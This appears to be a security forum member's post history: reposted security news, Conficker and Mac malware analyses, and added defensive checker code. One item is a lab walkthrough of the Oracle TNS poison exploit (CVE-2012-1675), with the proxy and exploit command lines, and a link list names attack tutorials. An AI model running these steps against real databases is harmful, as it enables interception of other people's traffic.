Nytro (Administrators)
Posts: 18715 | Days Won: 701

Everything posted by Nytro

  1. The trick with big salaries is that most of the time contracts are signed for long periods, and it is probably the same here: if they sign for 2-3 years, within 6 months they already know enough to deserve that salary (well, let's say a year), and after that they become "profitable" for the company.
  2. [h=2]Android Ported to C#[/h]

     Oracle and Google are currently in a $1 billion wrestling match over Google’s use of Java in Android. But Java is not the only way to build native apps on Android. In fact, it’s not even the best way: we have been offering C# to Android developers as a high-performance, low-battery consuming alternative to Java. Our platform, Mono, is an open source implementation of the .NET framework that allows developers to write their code using C# while running on top of the Java-powered operating system, and then share that same code with iOS and Windows Phone.

     Unlike Sun with Java, Microsoft submitted C# and the .NET VM for standardization to ECMA and saw those standards graduated all the way to ISO strong patent commitments. The .NET framework is also covered by Microsoft’s legally binding community promise.

     Last July when Xamarin was getting started, we got our team together in Boston to plan the evolution of Mono on iOS and Android. After a day of kayaking in the Charles River, we sat down to dinner and turned our attention to how we could improve the performance and battery life of applications on Android, and make our own Mono for Android even better.

     The Xamarin team after a day of kayaking, back when we were a small company

     Over and over we came back to the basics: Dalvik is a young virtual machine, it is not as performant or tuned as Mono and suffers from many of Java’s performance limitations without the benefit of the high-end optimizations from Oracle’s HotSpot. One crazy idea that the team had at that dinner was to translate Android’s source code to C#. Android would benefit from C# performance features like structures, P/Invoke, real generics and our more mature runtime. Although nothing happened back in July, this idea stuck in the back of our minds.

     Fast forward a few months: Mono for Android is doing great, and we are starting to think again about improving our own product’s performance on Android. What if we could swap out Java with faster C# and get rid of various Dalvik limitations in the process? Could we create an Android phone completely free of Java, and free of the limitations of the Dalvik VM? We decided it was crazy enough to try. So we started a small skunkworks project with the goal of doing a machine translation of Android from Java to C#. We called this project XobotOS.

     [h=2]The XobotOS Research Project[/h]
     The result of our efforts is that today we have most of Android’s layouts and controls entirely in C#. Here are some screenshots of XobotOS running on a Linux workstation, no Java involved:

     Getting to this point required that the majority of the Android Java code be translated from Java to C#, so what you see above represents very significant progress. So how did we do it?

     [h=2]Java Translation via Sharpen[/h]
     Android’s core codebase contains over a million lines of Java code, and we knew we wanted to be able to stay up to date with new releases of Android — in fact, we started with the Android 2.x source code back in 2011, and then upgraded XobotOS to Android 4.0 when Google open sourced Ice Cream Sandwich earlier this year. So for us, the only reasonable option was to do a machine translation of Java to C#, building and maintaining any necessary tools along the way.

     The tool we used as a starting point is called Sharpen. Sharpen is famous for helping people such as Frank Krueger port a Java applet to an award-winning iPad app in two months. We matured Sharpen a lot, and the result is a much-improved Java-to-C# translation tool for everyone. We are releasing this new version of Sharpen today along with the code for XobotOS and we hope that many more people will benefit from it and contribute to it.

     [h=2]Performance[/h]
     So once you have Android running on Mono, the obvious question is — how does Mono perform compared to Dalvik?

     When C# came around, Microsoft modified the language in a couple of significant ways that made it easier to optimize. Value types were introduced to allow small objects to have low overheads and virtual methods were made opt-in, instead of opt-out, which made for simpler VMs. Later on, Java and C# diverged in the way that they implemented generics. Java went with a full-backwards compatibility approach, while C# baked the support into the runtime. The C# approach led to a simple-to-use, simple-to-understand generics setup as well as being much more performant and complete.

     Since then, both the language and the execution environment have continued to evolve and improve. C# went from being a slightly better Java to being light-years ahead. It embraced dynamic programming, brought asynchronicity into the language, introduced iterators and functional programming constructs, embraced parallelism and got a great implementation of generics. Many of these features came from the research done by Don Syme and his F# team, who have kept a steady flow of new ideas getting injected into the language. Furthermore, Mono as a virtual machine has matured substantially in the last 10 years and is now considered to be on its 8th generation.

     All of this adds up. You can see the massive difference in the performance of structs and generics in this benchmark we ran of a simple binary tree implementation in Java and C#:

     [h=2]What’s Next[/h]
     Today we’re proud to announce that we’ve made XobotOS available on github so that you can try it out yourself. Our goal as a company is to provide the best platform for building mobile apps, and so XobotOS will not be a focus for us going forward. But it was a fun experiment to run, and as it turns out, a few technologies have come out of the effort that we’ll be able to include in future versions of our products:

     Direct Graphics Access to Skia: Currently Mono for Android accesses the underlying graphics libraries through Java; with the code that we built for XobotOS, we will skip the middleman and use Mono’s P/Invoke to get straight to the native rendering code in Skia.

     Java to C# tooling: Our new version of Sharpen is available as part of our XobotOS release.

     Replacing Java code with C# code: we now have the tools necessary to replace some chunks of Java code with C# code where performance is critical and when C# can offer better solutions than Java has.

     Our plan is to take elements of the research project and integrate those into our products. A project that we started because we thought it would be fun to do has turned out to yield some serious benefits for our products. It’s important for a startup to stay focused, but sometimes you have to try something crazy to make progress. And who knows, maybe Google will thank us some day.

     Xamarin is hiring for many positions to advance the state of the art in mobile development.

     Sursa: Android Ported to C# – Xamarin
  3. Regarding Microsoft Windows, for those who are sceptical about the security of Windows systems... Windows Firewall: Group policy editor: File permissions: And many others. Windows is not exactly "inept" when it comes to security; in fact, in my opinion it is the strongest in this area, and Linux and other operating systems still have a long way to go to reach its level. The problem is simple: "the users". How many would sit down and configure firewall rules or put restrictions on folders? Nobody. That is why I expect nobody to complain. Windows has what it takes, but nobody to use it. So Microsoft has every right to make fun of Apple.
  4. Updated:
     Yet Another Hotmail, AOL and Yahoo Password Reset 0Day Vulnerabilities
     Exploit writing: A basic Idea.
     Subterfuge - Man-in-the-Middle Attack Framework Tutorial
     Zuckerberg's employees get rich from the moment they are hired
     Ms12-027 Mscomctl Activex Buffer Overflow Metasploit Demo (Ipv6)
     Arbitrary File Upload And Bypassing Protections (Dvwa)
     Dos Attack On Win8 With Hping3 (Packet Flooding)
     Spoofing Dns With Nmap
     Fast Track Script Social Engineer-Toolkit And Windows Credentials Editor
     Microsoft Windows Eot Font Table Directory Integer Overflow
     Athcon 2010 Mobile Privacy: Tor On The Iphone And Other Unusual Devices
     Athcon 2010 "The Dhcp Recession: Extended Dhcp Exhausting Attack"
     Athcon 2011 Exploiting Anti-Reversing Techniques
     Athcon 2011 Win32 Exploit Development With Pvefindaddr + Project Quebec
     Arp/Dns Spoofing Steal Facebook Password (Lan Environment)
     Privilege Escalation via "Sticky" Keys
     Oracle discloses new zero day exploit and launches JDK for OS X
     SyScan 2012 Singapore slides
     Windows 8 Forensic Guide
     An interesting case of Mac OSX malware
     Targeting ZeroAccess Rootkit’s Achilles’ Heel
     Facebook source code hacker explains what really happened!
     Bitdefender USB Immunizer

     Facebook: https://www.facebook.com/rstforum
  5. [h=1]How far behind is Apple's security?[/h]

     Paul Wagenseil, SecurityNewsDaily Managing Editor

     Kaspersky Lab founder Eugene Kaspersky made headlines last week when he declared that Apple was "10 years behind Microsoft in terms of security." Kaspersky was referring to the recent spread of the Flashback family of malware, which was greatly aided by Apple's long delay in patching a known software flaw. But is Apple really 10 years behind the times?

     "I'd say that Apple's got another 10 years to go before their security will become as much of a laughingstock as Microsoft's," said Jonathan Zdziarski, author of "Hacking and Securing iOS Applications" (O'Reilly, 2012) and a forensic scientist who hacks into iPhones for Chicago-based viaForensics.

     "Comparing Apple and Microsoft is like comparing apples and oranges," said Mikko Hypponen, chief security officer of Finnish anti-virus firm F-Secure. (Msnbc.com is a joint venture of Microsoft and NBCUniversal.)

     [FAQ: The New Mac Virus and Apple Anti-Virus Options]

     Trustworthy computing

     Kaspersky's choice of 10 years as the time frame was not random. In January 2002, then-Microsoft chairman Bill Gates issued his famous "Trustworthy Computing" memo to all company personnel. He wrote it shortly after the release of Windows XP, when the brand-new platform was under constant attack by virus writers and hackers.

     "Every week there are reports of newly discovered security problems in all kinds of software, from individual applications and services to Windows, Linux, Unix and other platforms," Gates wrote in the memo. "Our responsiveness has been unmatched — but as an industry leader we can and must do better. ... Eventually, our software should be so fundamentally secure that customers never even worry about it."

     Gates' memo inaugurated a companywide focus on security, an aspect that had been neglected for the first two decades of Microsoft's existence.

     Ten years later, Windows 7 users still need to worry about malware, but Microsoft's current platform is tremendously stronger and more secure than Windows XP. (Even today, XP, not Windows 7, gets the most malware attacks.)

     "Microsoft has improved their security massively since 2002," Hypponen said. "Today, they are [a] model for good security process in many ways."

     Microsoft got to that point by essentially outsourcing Windows security. The entire anti-virus industry, with sales of several billion dollars per year, is built on defeating malware that targets Windows. The existence of that industry frees up Microsoft to work on patching Windows, which it does extensively every month. Microsoft's open model lets major Windows software makers such as Adobe or Oracle do the same without Microsoft's approval.

     Go your own way

     Apple, on the other hand, disdains third-party anti-virus software for Macs — though it does exist — and insists on patching certain pieces of third-party software itself. The Flashback software flaw, discovered in January, was patched for Windows in three weeks. It wasn't patched for Macs until after nearly three months — and after an estimated 600,000 Macs worldwide had been infected.

     "Apple needs to learn the meaning of transparency," Zdziarski said. "They need to communicate with their user base and with the security community. They need to be quicker to respond to threats."

     He pointed out that Apple's closed-lipped attitude also applies to iOS, the software that runs the iPhone, iPad and iPod Touch. "Some iOS attacks from the past took months to fix," Zdziarski said. "The [iPhone] jailbreak community had fixes out for users before Apple did. That's shameful."

     Qualified kudos

     Despite the secrecy, and despite the lack of attacks on Mac OS X, Apple has for many years incorporated the latest security innovations into its operating systems.

     "Apple might have some sort of an attitude problem, which shows in their slow patch cycles and so [on]," Hypponen said. "But otherwise, it's hard to critique them with all they've done with OS X: app sandboxing, memory randomization, NX [non-executable memory] support, [the] App Store model."

     When the iPhone was introduced, Apple was starting from scratch on a brand-new operating system. It took the opportunity to bake advanced security features into iOS from the very beginning.

     "[The] iPhone (or actually, iOS) is a massive security success," Hypponen said. "iOS is now 5 years old and we still haven't seen a single malware attack against it."

     Zdziarski wasn't sure how long that blissful interlude would last. "With Objective-C applications now on over 100 million-plus devices, the threat is very real," he said, referring to the programming language used to create Mac OS X and iOS software.

     "It's only a matter of time before a serious worm hijacks tens of millions of devices and thousands of App Store apps at once, and similar on the desktop," Zdziarski said. "Flashback seemed small potatoes; more of a warning that Apple runs the risk of screwing up as big as Microsoft in letting poor design lead to widespread attacks."

     Sursa: How far behind is Apple's security? - Technolog on msnbc.com
  6. Bitdefender USB Immunizer

     Bitdefender USB Immunizer is a free and easy to use tool that helps make sure you transfer the files, not the viruses. It disables autorun-related threats before they access the computer. Once installed, it constantly watches for newly inserted USB storage devices and immunizes them on the fly.

     Download: http://labs.bitdefender.com/wp-content/plugins/download-monitor/download.php?id=BDUSBImmunizerLauncher.exe

     Sursa: Free Anti-Virus Programs, Plugins and Apps - Bitdefender
  7. [h=1]8 Reasons Conficker Malware Won't Die[/h]

     Poor corporate password practices and continuing use of Autorun help explain why eradicating this three-year-old worm has been so difficult.

     By Mathew J. Schwartz, InformationWeek, April 30, 2012 10:37 AM

     Obstinate. That's how Microsoft has labeled Conficker, which, despite being three years old and targeted for eradication, continues to survive--and even thrive--in corporate networks.

     As recently as the fourth quarter of 2011, Conficker variants launched 59 million attacks against 1.7 million unique PCs, according to the latest installment of the Microsoft Security Intelligence Report, which reviewed attack trends for the second half of 2011. Whereas most malware disproportionately affects consumers, the report found that Conficker is "more prevalent on domain-joined computers," meaning business machines.

     Here are eight reasons why killing Conficker remains so tough:

     1. Conficker was built to topple business networks. Conficker is designed to persist. All of the worm's payload traffic is encrypted, making infections difficult to spot. The worm can also disable many types of free antivirus software as well as Microsoft Windows Update, thereby disabling automatic security updates. That not only buys the worm time to spread, but can provide a toehold for other malicious software, thus compounding businesses' security problems.

     2. The worm spreads via Autorun. More recent variations of Conficker attempt to auto-execute via Autorun, which helps it spread not just via network shares, but also USB keys and other types of removable storage. Accordingly, Microsoft has recommended disabling Autorun.

     3. Weak passwords help Conficker. When Conficker first infects a PC, it attempts to use the user's current credentials to copy itself to administrative shares, thereby spreading the infection. If that fails, the worm switches to a more aggressive approach. "Conficker has a small dictionary of passwords that is used in a brute-force attack against other machines in the network, and it continues to be surprisingly effective," said Wolfgang Kandek, CTO of Qualys, in a blog post. How weak or common are these passwords? Try words or numbers such as 0000, 1111, Admin, and coffee. "[Conficker's] dictionary attack is very basic and is prevented even by enforcing simple password composition policies, i.e. adding [numbers] and special characters to only alpha-type passwords," he said.

     4. Conficker can remain dormant. If, after trying all of the above, Conficker still fails to spread to admin shares, it will simply hibernate. What brings it back to life? That would be an administrator, using admin credentials to log onto the machine, perhaps while investigating a user's reports of suspicious behavior. Once the PC has been accessed using admin credentials, the worm will again attempt to use these permissions to copy itself around the network.

     5. Conficker spreads without bugs. Most malware targets known vulnerabilities. But according to Microsoft, the above password-attack vectors accounted for "100% of all recent infection attempts from Conficker targeting ... users on Windows 7 and Windows Vista platforms." Likewise, 91% of Conficker attacks against Windows 2003 machines targeted passwords, while only 9% targeted a vulnerability patched by Microsoft in October 2008.

     6. Repeat outbreaks are common. Conficker's continued spread highlights the ongoing use of weak passwords. "During the first quarter of 2011, the average number of times Conficker attacked a single computer was 15, but by the fourth quarter that number had more than doubled to 35," reported Microsoft. The sheer volume of repeat attacks suggests that businesses are failing to eradicate Conficker from every PC inside the enterprise after they detect an infection. As a result, copies of the worm persist, triggering subsequent outbreaks.

     7. Virtualization may stoke the worm's spread. Some security watchers see virtualization as another culprit behind Conficker's continued existence. "'VM sprawl'--or the idea that a virtual machine can be easily created and then archived--means there are many virtual machines offline without security updates. Then, when these machines are brought back online, they can get re-infected very easily," said Kapil Raina, a director at Zscaler, via email. "With today's move to the cloud and leveraging services like AWS EC2, there are many, many virtual machines without proper patching. It's like a time bomb waiting to happen when they come back online."

     8. Businesses ignore security basics. Want to keep Conficker out of your enterprise? Keep antivirus definitions up to date, disable Autorun, and assess any potential risk you could face if your company uses outdated, virtualized operating systems. Finally, get tough on passwords. "A single computer with a weak password could easily be enough to cause a major disruption inside a corporate network, especially considering the increasing trend in the number of Conficker attacks per computer," said Joe Blackbird of the Microsoft Malware Protection Center (MMPC), in a blog post.

     Sursa: 8 Reasons Conficker Malware Won't Die - Security - Vulnerabilities and threats - Informationweek
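The point Kandek makes in reason 3, that a tiny word list only succeeds against plain-word passwords and that a simple composition policy shuts it out, can be checked directly. The following is an added example, not code from the article, Microsoft or Qualys; the word list contains the four examples the article quotes plus constructed filler, and the accounts are constructed too.

```python
"""Added example: does a simple composition policy cover every account a
Conficker-style word list would hit? The word list and accounts below are
constructed for the demonstration; this is not Conficker's real dictionary."""
import re

# Constructed word list in the style the article describes (short, obvious),
# containing the four examples the article quotes.
SAMPLE_WORDLIST = ["0000", "1111", "Admin", "coffee", "password", "test", "admin123"]

# Constructed accounts, username -> password, as they might exist on a small domain.
SAMPLE_ACCOUNTS = {
    "svc-backup": "coffee",
    "jdoe": "Coffee",
    "admin": "Admin",
    "kiosk": "0000",
    "dba": "C0ffee!2012",
    "helpdesk": "Sp00l-Pr1nt",
}

def dictionary_hits(accounts, wordlist=SAMPLE_WORDLIST):
    """Usernames whose password equals a word-list entry. The comparison is
    case-insensitive, assuming the attack tries each word in a few casings."""
    words = {w.lower() for w in wordlist}
    return sorted(u for u, p in accounts.items() if p.lower() in words)

def policy_violations(password, min_length=8):
    """Violations of a simple composition policy (assumed: minimum length,
    at least one letter, one digit and one special character).
    An empty list means the password passes."""
    checks = [
        (len(password) >= min_length, "shorter than %d" % min_length),
        (re.search(r"[A-Za-z]", password) is not None, "no letter"),
        (re.search(r"[0-9]", password) is not None, "no digit"),
        (re.search(r"[^A-Za-z0-9]", password) is not None, "no special character"),
    ]
    return [msg for ok, msg in checks if not ok]

def policy_rejects(accounts):
    """Usernames whose current password the policy would have refused."""
    return sorted(u for u, p in accounts.items() if policy_violations(p))

def policy_covers_dictionary(accounts, wordlist=SAMPLE_WORDLIST):
    """True if every account the word list hits is one the policy rejects,
    i.e. enforcing the policy would have prevented each of those hits."""
    return set(dictionary_hits(accounts, wordlist)) <= set(policy_rejects(accounts))

if __name__ == "__main__":
    print("word-list hits   :", dictionary_hits(SAMPLE_ACCOUNTS))
    print("policy rejects   :", policy_rejects(SAMPLE_ACCOUNTS))
    print("policy sufficient:", policy_covers_dictionary(SAMPLE_ACCOUNTS))
```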
  8. [h=2]UK High Court: ISPs Must Block Access To The Pirate Bay[/h]

     by FREDERIC LARDINOIS, posted 12 Hours Ago

     The British Phonographic Industry (BPI) finally got its will today. According to a ruling by Britain’s High Court, UK Internet providers must now block access to Swedish file-sharing site The Pirate Bay. The BBC reports that the BPI had asked British ISPs to voluntarily block access to the site in November 2011. At that time, though, the ISPs said they wouldn’t do so unless ordered by a court. That court order has now arrived.

     Five UK ISPs (Sky, Everything Everywhere, TalkTalk, O2 and Virgin Media) have already announced that they will comply with this order. BT asked the court for more time to consider its position.

     According to the BPI’s chief executive Geoff Taylor, “the High Court has confirmed that The Pirate Bay infringes copyright on a massive scale. Its operators line their pockets by commercially exploiting music and other creative works without paying a penny to the people who created them.” A number of studies, though, have questioned this line of reasoning and instead found that sites like The Pirate Bay actually have a positive impact on overall music sales.

     A spokesperson for Virgin Media told the BBC that it will comply with the ruling, but that the company also “strongly believes that changing consumer behaviour to tackle copyright infringement also needs compelling legal alternatives, such as our agreement with Spotify, to give consumers access to great content at the right price.”

     Today’s ruling is not a first for Europe. Courts in the Netherlands, Belgium, Finland, Denmark and Italy already issued similar rulings over the last few years.

     Sursa: UK High Court: ISPs Must Block Access To The Pirate Bay - TechCrunch
  9. [h=3]Security Week In Review, April 23-27[/h]

     Infections and exploits plagued this week in security, affecting everything from the Mac OS X to Oracle database servers. High profile leaks and a passage of a controversial information sharing bill also graced the security landscape. Here’s a look at April 23-27.

     VMware Source Code Leaked: Last week, VMware confirmed an attack that led to the online publication of source code for its ESX hypervisor and said that more could be on the way. The individual stepping up to take credit for the attack was a hacker going by the handle of Hardcore Charlie, who also claimed responsibility for another hack on military contractor China National Import & Export Corp earlier this month. “The fact that the source code may have been publicly shared does not necessarily mean that there is any increased risk to VMware customers. VMware proactively shares its source code and interfaces with other industry participants to enable the broad virtualization ecosystem today,” said Iain Mulholland, director of the VMware Security Response Center, in a blog post. Hardcore Charlie also tweeted that he possessed EMC source code, which he said he also planned to post.

     Microsoft Fixes Hotmail Password Flaw: Redmond patched a password reset vulnerability in its Hotmail Web mail service last week that potentially exposed its more than 360 million users to account compromises. Specifically, the glitch enabled miscreants with a Firefox add-on to circumvent security restrictions and remotely reset the password of a Hotmail account by modifying the data, while also enabling them to decode CAPTCHA and send automated values over the MSL Live Hotmail module. When the reset button was hit, hackers could then manipulate the requests and put in their own reset information. Luckily for Hotmail’s 360 million users, the bug was discovered and repaired in a relatively short window of time. Microsoft got wind of the vulnerability April 20 and issued a fix the following day. The fix went public at the end of last week.

     House Passes CISPA Bill: The controversial Cyber Information Sharing and Protection Act passed in the House of Representatives by a vote of 248 to 168 at the end of last week, despite a strong public backlash from privacy advocates and academia who asserted that the move violated privacy rights. Specifically, the bill, supported by firms such as Facebook, financial trade associations, AT&T, utilities, Intel, and several tech companies, among others, gives the federal government a lot of leeway to share classified cyber threat information with U.S. companies. The bill also simultaneously eliminates many restrictions to information sharing between organizations. The bill’s chief supporter and architect Mike Rogers applauded the legislation as a move in the right direction toward the comprehensive protection of U.S. networks against cyber spies and thieves from Russia and China. However, CISPA’s opponents, including the Center for Democracy and Technology, as well as the ACLU, called the bill ‘overly broad’ and contended that it would serve to erode users’ Internet freedoms and privacy.

     Oracle Suffers Critical Glitch: A critical vulnerability enabling remote code execution in all versions of the Oracle database server remains unpatched even after Oracle attempted to fix the flaw with its April Critical Patch Update, according to reports circulating last week. Specifically, the vulnerability, occurring in the TNS Listener service, a function which routes connection requests from clients to the server, allows attackers to intercept server traffic and execute malicious commands on the system. The vulnerability exists in all Oracle versions, affecting customers using 8i, 9i, 10g, and 11g (11g R2). If exploited, a remote attacker has complete control of the data exchanged between the server database and the client machines, which paves the way for miscreants to hijack users’ sessions and inject code to do their malicious bidding. Oracle recently patched the flaw in the TNS Listener service in its April update. However, it turns out that the fix didn’t apply to current versions of the Oracle database, leaving many customers subject to arbitrary attacks aiming to exploit the vulnerability.

     New Flashback Variant Attacks Macs: Yet another Flashback variant was discovered sweeping through users’ Mac OS X machines last week. This time, Mac security firm Intego reported the pesky Mac malware installs on users’ computers without requiring a password. The latest Flashback version, known as Flashback.S, inserts itself in one of the user’s home folders that include ~/Library/LaunchAgents/com.java.update.plist or ~/.jupdate. Once it has completely installed itself, the malware then deletes all files and folders in ~/Library/Caches/Java/cache in order to eliminate the applet from the infected Mac, and avoid detection or sample recovery, according to Intego. The Mac-focused Flashback Trojan was first discovered in September 2011, impersonating a bogus Adobe Flash Player installer. The malware has since gone on a rampage against the Mac OS X platform with numerous variants that have exploited a slew of Java vulnerabilities, ultimately infecting as many as 650,000 machines, according to reports.

     by Stefanie Hoffman | April 30, 2012 at 5:05 pm

     Sursa: Security Week In Review, April 23-27 | Fortinet Security Blog
  10. Fun stuff

  11. [h=1]CVE-2012-1675 Oracle Database TNS Poison 0Day Video Demonstration[/h]

      [h=4]Timeline :[/h]
      Vulnerability discovered by Joxean Koret in 2008
      Vulnerability reported to the vendor by Joxean Koret in 2008
      Public release of the vulnerability in Oracle CPU by the vendor on 2012-04-17
      Details and PoC of the vulnerability released by Joxean Koret on 2012-04-18
      Fake patching of the vulnerability discovered by Joxean Koret on 2012-04-26

      [h=4]PoC provided by :[/h]
      Joxean Koret

      [h=4]Reference(s) :[/h]
      Oracle CPU of April 2012
      Joxean Koret details and PoC
      CVE-2012-1675
      Oracle Security Alert for CVE-2012-1675

      [h=4]Affected version(s) :[/h]
      All versions of Oracle Database

      [h=4]Tested with :[/h]
      Oracle Database 10g Enterprise Edition Release 10.2.0.4.0

      [h=4]Description :[/h]
      Usage of Joxean Koret's PoC requires that the database name has a length of 6 characters.

      Database server characteristics:
      IP : 192.168.178.150
      Oracle version : 10.2.0.4.0
      Database listener port : 1521
      Database listener has no client IP restrictions
      Database name : arcsig
      Database username : arcsig
      Database password : testtest

      Database client characteristics:
      IP : 192.168.178.151
      SQL*Plus version : 10.2.0.4.0
      “tnsnames.ora” file as below:

          TARGET.DB=
            (DESCRIPTION =
              (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.178.150)(PORT = 1521))
              (CONNECT_DATA = (SERVICE_NAME= arcsig))
            )

      Attacker characteristics:
      IP : 192.168.178.100
      Usage of PoC provided by Joxean Koret

      [h=4]Demonstration :[/h]
      PoC validation phase

      On database server:
          ifconfig
          ps faux
          netstat -tan

      On database client:
          ifconfig
          sqlplus -v
          cat tnsnames.ora
          sqlplus arcsig@TARGET.DB
          HELP
          QUIT

      PoC exploitation phase

      On attacker, start the MITM proxy, which will intercept the communication between the client and the database:
          sudo python proxy.py -l 192.168.178.100 -p 1521 -r 192.168.178.150 -P 1521
      Start the vulnerability exploitation:
          python tnspoisonv1.py 192.168.178.100 1521 arcsig 192.168.178.150 1521

      On the database client, connect with SQL*Plus:
          sqlplus arcsig@TARGET.DB
          ? ?
          INDEX TOTO
          QUIT

      You can see that the communication is intercepted by the proxy.

      Sursa: CVE-2012-1675 Oracle Database TNS Poison 0Day Video Demonstration
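The demo above works because the listener accepts instance registration from any TCP peer ("no client IP restrictions"). The following is an added example, not part of the post or of Joxean Koret's PoC: a parser for Oracle Net parameter files (the parenthesised format of the tnsnames.ora entry shown above) and a check of listener.ora for the registration restrictions that Oracle's COST guidance documents for this issue. The parameter names SECURE_REGISTER_<listener> and VALID_NODE_CHECKING_REGISTRATION_<listener> are Oracle's; the listener.ora samples are constructed, and which values count as hardened is this example's assumption.

```python
"""Added example (not from the post or the PoC): parse Oracle Net parameter
files and report listeners that still accept instance registration over TCP.
Samples are constructed; parameter names follow Oracle's documentation."""
import re

TOKEN = re.compile(r"[()=,]|[^\s()=,]+")

# tnsnames.ora entry exactly as shown in the post (whitespace only).
TNSNAMES_SAMPLE = """
TARGET.DB=
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.178.150)(PORT = 1521))
    (CONNECT_DATA = (SERVICE_NAME= arcsig)))
"""
# Constructed listener.ora in the state the post describes: TCP listener,
# no registration restrictions. The second copy adds the documented mitigations.
LISTENER_WEAK = """
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.178.150)(PORT = 1521))))
"""
LISTENER_HARDENED = LISTENER_WEAK + """
SECURE_REGISTER_LISTENER = (IPC)     # registration accepted only over IPC
VALID_NODE_CHECKING_REGISTRATION_LISTENER = ON
"""

def tokenize(text):
    """Split into '(', ')', '=' and atoms; '#' comments and the commas of
    lists such as (TCPS, IPC) are dropped."""
    stripped = "\n".join(line.split("#", 1)[0] for line in text.splitlines())
    return [t for t in TOKEN.findall(stripped) if t != ","]

def parse(text):
    """Parse into {NAME: value}. A value is a bare string or a list of
    (key, value) pairs; a bare element such as (IPC) becomes ("IPC", None)."""
    toks = tokenize(text)
    pos = 0

    def peek():
        return toks[pos] if pos < len(toks) else None

    def expect(tok):
        nonlocal pos
        if peek() != tok:
            raise ValueError("expected %r at token %d, got %r" % (tok, pos, peek()))
        pos += 1

    def parse_value():
        nonlocal pos
        if peek() is None:
            raise ValueError("unexpected end of input")
        if peek() != "(":                    # bare atom: ON, OFF, 1521, ...
            pos += 1
            return toks[pos - 1]
        items = []
        while peek() == "(":                 # one or more (...) groups in a row
            pos += 1
            key = toks[pos]
            pos += 1
            if peek() == "=":
                pos += 1
                items.append((key, parse_value()))
            else:                            # bare list: (IPC) or (TCPS, IPC)
                items.append((key, None))
                while peek() not in (")", "(", None):
                    items.append((toks[pos], None))
                    pos += 1
            expect(")")
        return items

    conf = {}
    while peek() is not None:
        name = toks[pos]
        pos += 1
        expect("=")
        conf[name.upper()] = parse_value()
    return conf

def find(value, key):
    """Every value stored under `key` anywhere inside `value` (case-insensitive)."""
    found = []
    if isinstance(value, list):
        for k, v in value:
            if k.upper() == key:
                found.append(v)
            found.extend(find(v, key))
    return found

def listener_names(conf):
    """Top-level entries that describe a listener endpoint (they contain an ADDRESS)."""
    return [name for name, val in conf.items() if find(val, "ADDRESS")]

def registration_findings(conf):
    """Assumed hardened state: SECURE_REGISTER_<name> set and excluding TCP,
    and VALID_NODE_CHECKING_REGISTRATION_<name> not OFF on TCP listeners."""
    findings = []
    for name in listener_names(conf):
        tcp = any(str(v).upper() == "TCP" for v in find(conf[name], "PROTOCOL"))
        secure = conf.get("SECURE_REGISTER_" + name)
        allowed = [k.upper() for k, _ in secure] if isinstance(secure, list) else []
        if secure is None:
            findings.append("%s: SECURE_REGISTER_%s not set" % (name, name))
        elif "TCP" in allowed:
            findings.append("%s: SECURE_REGISTER_%s still allows TCP" % (name, name))
        vnc = str(conf.get("VALID_NODE_CHECKING_REGISTRATION_" + name, "OFF")).upper()
        if tcp and vnc in ("OFF", "0"):
            findings.append("%s: VALID_NODE_CHECKING_REGISTRATION_%s is off" % (name, name))
    return findings

if __name__ == "__main__":
    entry = parse(TNSNAMES_SAMPLE)["TARGET.DB"]
    print("client target:", find(entry, "HOST"), find(entry, "PORT"), find(entry, "SERVICE_NAME"))
    for label, text in (("weak", LISTENER_WEAK), ("hardened", LISTENER_HARDENED)):
        print(label, registration_findings(parse(text)) or ["no findings"])
```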
  12. [h=3]Facebook source code hacker explains what really happened![/h]

      Software development student Glenn Mangham, 26, was freed earlier this month after appeal judges halved the eight-month prison sentence he was given for infiltrating and nearly bringing down the multi-million-dollar site.

      Glenn Mangham, of York, England, posted a lengthy writeup on his blog and a video, saying that he accepts full responsibility for his actions and that he did not think through the potential ramifications. "Strictly speaking what I did broke the law because at the time and subsequently it was not authorised," Mangham wrote. "I was working under the premise that sometimes it is better to seek forgiveness than to ask permission."

      Initially sentenced to 8 months in prison, the Court of Appeal in London decided that there weren’t any ill intentions on the hacker’s behalf, the judges deciding not only to release him, but also to allow him to use the Internet once again.

      After criticizing the CSO for attacking him while he was locked up, Mangham explained in detail why he took the Facebook source code, why he didn’t use any proxies to cover up his tracks and he even revealed the exact amount of damage he believed his actions had caused.

      http://www.youtube.com/watch?v=emzOZH1-v9E&feature=player_embedded
  13. Linux Memory Images

      We make these sample Linux memory images available in the hope they may be useful for research, training, testing, or other purposes. If you find them to be of value, please drop us a line via the contact form on this web site.

      Filename | Size | Hash | Description | BitTorrent Download
      centos-5.6-i386-kbeast.mem.bz2 | 705266494 bytes (673MB) | sha256sum | This is a bzip2-compressed memory image taken from a VirtualBox VM allocated 2GB RAM, running from a CentOS 5.6 LiveCD, infected with the kbeast rootkit. Memory was acquired via the VirtualBox dumpguestcore command, as described here. | Magnet Link
      ubuntu-10.04-i386-kbeast.mem.bz2 | 480042093 bytes (458MB) | sha256sum | This is a bzip2-compressed memory image taken from a VirtualBox VM allocated 1GB RAM, running from an Ubuntu 10.04.3 LiveCD, infected with the kbeast rootkit. Memory was acquired via the VirtualBox dumpguestcore command, as described here. | Magnet Link

      Sursa: Second Look
  14. [h=3]An interesting case of Mac OSX malware[/h] msft-mmpc 30 Apr 2012 4:20 PM

In June 2009, Microsoft issued security update MS09-027, which fixed a remote code execution vulnerability in the Mac version of Microsoft Office. Despite the availability of the bulletin (and the passage of time), not every machine is up to date yet – which is how, nearly three years later, malware has emerged that exploits the issue on machines running Office on Mac OS X. Fortunately, our data indicates that this malware is not widespread, but during our investigation we found a few interesting facts we’d like to share with you. For our investigation, we used a malware sample (SHA1: 445959611bc2480357057664bb597c803a349386) that is detected as Exploit:MacOS_X/MS09-027.A.

Figure 1 - Overall Execution Flow

Firstly, the vulnerability is a stack-based buffer overflow - the attack code could corrupt variables and return addresses located on the stack. As we analyzed the malware, we found that the malware author managed to corrupt a local variable and used that corrupted variable to deploy 'stage 1' shellcode to a designated area. This corrupted variable is later used for a target address and is where the stage 1 shellcode is copied. The corrupted return address points to this target address as well. This target address is important, as, with Snow Leopard, we could confirm that it was used to exploit a specific location on the heap that is writable and also executable. The point is that with Lion, that specific memory address can't be written, so the exploit fails. We can assume that this malware itself is targeting only Snow Leopard or lower versions of Mac OSX. That means the attacker had knowledge about the target environment beforehand. That includes the target operating system, application patch levels, etc.

Figure 2 - Stage 1 Shellcode

